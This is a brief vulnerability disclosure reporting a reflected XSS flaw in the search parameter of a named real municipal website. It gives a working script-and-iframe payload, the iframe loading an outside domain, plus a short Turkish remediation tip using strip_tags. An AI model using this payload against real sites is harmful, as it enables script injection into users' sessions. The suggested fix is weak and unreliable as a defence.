XSS Vulnerability

Target Website

https://www.guney.bel.tr/

Payload

</><SCRIPT>alert("XSS+Tested+By+UmutPW") </SCRIPT> 
 </> <IFRAME src="https://umut.pw"></IFRAME>

Vulnerability

Reflected XSS

Sample Scenario

Vulnerability Blocked ?

Veri Get Metotu ile kelime etiketinde gönderiliyor ilk olarak arama sorgusuna gelen veri aktarılmadan önce $new = strip_tags($_REQUEST[‘kelime’]); olarak kullanılabilir yada şu yazımı okuyabilirsiniz Görüşmek Üzere !